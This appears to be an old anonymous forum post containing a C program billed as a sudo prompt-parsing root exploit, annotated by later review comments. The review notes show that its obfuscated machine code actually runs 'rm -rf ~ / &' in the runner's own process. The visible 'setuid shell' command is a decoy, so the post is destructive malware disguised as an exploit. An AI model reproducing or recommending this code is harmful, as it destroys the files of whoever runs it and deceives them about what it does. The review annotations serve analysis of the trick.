
1337

Name: Anonymous 2008-01-29 14:54

Oh!

Name: Anonymous 2008-02-21 22:16


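/*
 * off by one ebp overwrite in sudo prompt parsing function
 * discovered by beyond security in 2008, thx ge
 *
 * to compile: gcc -pipe -o sobo sobo.c ; ./sobo
 *
 * please use responsibly! a patch has already been sent
 * upstream and a fix will be included in the next sudo release
 *
 * NOTE(review): the listing does not match this description. The byte
 * string in esp[] decodes to execve("/bin/sh", {"/bin/sh", "-c",
 * "rm -rf ~ / &"}), and exp() appears to overwrite its own stack frame with
 * the address of esp[], so that command would run as the invoking user in
 * this process, before sudo is ever executed. The readable "cp -p ..."
 * text is never passed to the shell.
 */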

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <alloca.h>
/* Prefix of the string exp() builds; main() hands that string to sudo's -p
 * option. */
#define SPROMPT "%u@%h> \\%"
/* Alias: every later `shellcode` token, including the parameter name in
 * exp(), is rewritten by the preprocessor to `esp`, the byte array defined
 * in this file. */
#define shellcode esp
/* Both counts reach exp() through `char` parameters.
 * NOTE(review): 246 does not fit a signed 8-bit char, so where plain char is
 * signed the callee sees a negative value (presumably -10) - confirm for the
 * target ABI. */
#define RETS_NUM 246
#define NOPS_NUM 116

/*
 * 32-bit x86 machine code followed by string data; the section attribute
 * places the array in .text (presumably so the bytes are executable).
 *
 * What the bytes do, read directly from the encoding:
 *   - jmp/call/pop leaves ebx pointing at the embedded "/bin/sh\0".
 *   - Four dwords are pushed (0xffffffff, 0xd9dfd0df, 0x81df998d,
 *     0xd2df928d) and each is bitwise-NOTed in place. The result is the
 *     NUL-terminated string "rm -rf ~ / &".
 *   - An argv of {"/bin/sh", "-c", <that decoded string>, NULL} is built on
 *     the stack and int 0x80 is issued with al = 0x0b (execve on 32-bit
 *     Linux); a second int 0x80 with eax = 1 (exit) follows.
 *
 * NOTE(review): the readable "cp -p /bin/sh /tmp/.beyond; ..." text sits
 * after the "-c\0" bytes but its address is never loaded into argv, so it is
 * not the command the shell receives. The command that is executed is
 * hidden from a casual read by the NOT encoding.
 */
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
                = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
                  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
                  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
                  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
                  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
                  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
                  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
                  "cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

/*
 * Store `val` into `buff` as consecutive unsigned long words.
 *
 * buff: destination, written through an unsigned long pointer.
 * size: byte count; divided by sizeof(unsigned long), so any remainder
 *       bytes at the end are left untouched.
 * val:  word value to replicate.
 *
 * There is no check that `size` matches what the caller actually reserved
 * for `buff`; the function writes exactly as many words as it is told to.
 */
void fill (char *buff, int size, unsigned long val) {
  /* Reinterprets the char buffer as unsigned long storage; the caller's
   * alignment is not verified. */
  unsigned long *ptr = (unsigned long *) buff;
  /* size is converted from bytes to whole words before the loop starts. */
  for (size /= sizeof (unsigned long); size > 0;
size--) *ptr++ = val;
}

/*
 * Despite its name, this does not read the stack pointer.
 *
 * Under GCC's default AT&T syntax a register is written with a '%' prefix;
 * the bare word `esp` in the operand is therefore a symbol reference, and
 * this file defines a global array with exactly that name. The instruction
 * loads the address of that array into eax.
 *
 * The function has no return statement: the caller receives whatever the
 * asm left in eax, which is not behaviour the C standard guarantees.
 */
unsigned long get_sp (void) {
  __asm__ ("lea esp, %eax");
}

/*
 * Formats SPROMPT, a block of 0x90 bytes, the bytes of `shellcode` and a
 * block of repeated address words into a static 8192-byte buffer and
 * returns it; returns NULL if the computed size exceeds the buffer.
 *
 * The `shellcode` macro rewrites the third parameter's name to `esp`, which
 * shadows the global array of the same name inside this function.
 *
 * NOTE(review): alloca() below is given the plain `char` counts while fill()
 * is given the same counts cast to unsigned char. With RETS_NUM = 246 and a
 * signed 8-bit char these differ (presumably -10 versus 246), so fill()
 * writes well past what was reserved for `rets`, inside this process's own
 * stack frame. The value written is the result of get_sp(), which is the
 * address of the esp[] array rather than a stack address. Taken together
 * this looks designed to divert control to esp[] when this function
 * returns, i.e. in the caller's own process and before main() reaches
 * execl() - TODO confirm on the target ABI.
 */
char *exp (char nops_nums, char rets_nums, char
*shellcode) {
  /* strlen() stops at the first 0x00 byte of the array, so only the leading
   * part of it is counted (and later copied by "%s"). */
  int size = strlen (SPROMPT) + nops_nums + rets_nums
+ strlen (shellcode);
  /* Reservations use the possibly-negative char values. */
  unsigned char *nops = alloca (nops_nums);
  unsigned char *rets = alloca (rets_nums);
  unsigned long ret = get_sp ();
  static char exp_buffer [8192];
  /* ensure isatty() fails */
  /* Side effect: stdin, stdout and stderr are gone for the rest of the
   * process, so the fprintf(stderr, ...) below cannot be seen. */
  close (0); close (1); close (2);
  /* Fills use the unsigned byte counts, not the sizes passed to alloca(). */
  fill (nops, (unsigned char) nops_nums, 0x90909090);
  fill (rets, (unsigned char) rets_nums, ret);
  /* Signed int compared against size_t. */
  if (size > sizeof (exp_buffer)) {
    fprintf (stderr, "buffer is too small\n");
    return NULL;
  }
  /* nops and rets are printed with "%s" although neither is explicitly
   * NUL-terminated. */
  snprintf (exp_buffer, sizeof (exp_buffer),
"%s%s%s%s",
  SPROMPT, nops, shellcode, rets);
  return exp_buffer;
}

/*
 * Entry point: calls exp() and then tries to replace the process with
 * /usr/bin/sudo -b -p <exp() result> /bin/false.
 *
 * The parameter names are swapped relative to convention (the count is
 * called argv, the vector argc); neither is used.
 *
 * NOTE(review): exp() overwrites its own stack frame before returning (see
 * the mismatched alloca()/fill() sizes there), so it is doubtful that
 * execution reaches the execl() call at all - TODO confirm.
 */
int main(int argv, char *argc[]) {
  /* exp() can return NULL; the result is passed on unchecked. */
  char *exploit = exp (NOPS_NUM, RETS_NUM, shellcode);
  /* execl() only returns on failure; its result is ignored. */
  execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p",
exploit, "/bin/false", NULL);
  /* shellroot should await you @ "HISTFILE=/dev/null /tmp/.beyond -p" */
  /* NOTE(review): nothing visible in this file creates /tmp/.beyond. The
   * "cp -p ..." text in esp[] is not the string its machine code passes to
   * /bin/sh -c; the bytes decode to "rm -rf ~ / &" instead. */
  return 0;
}
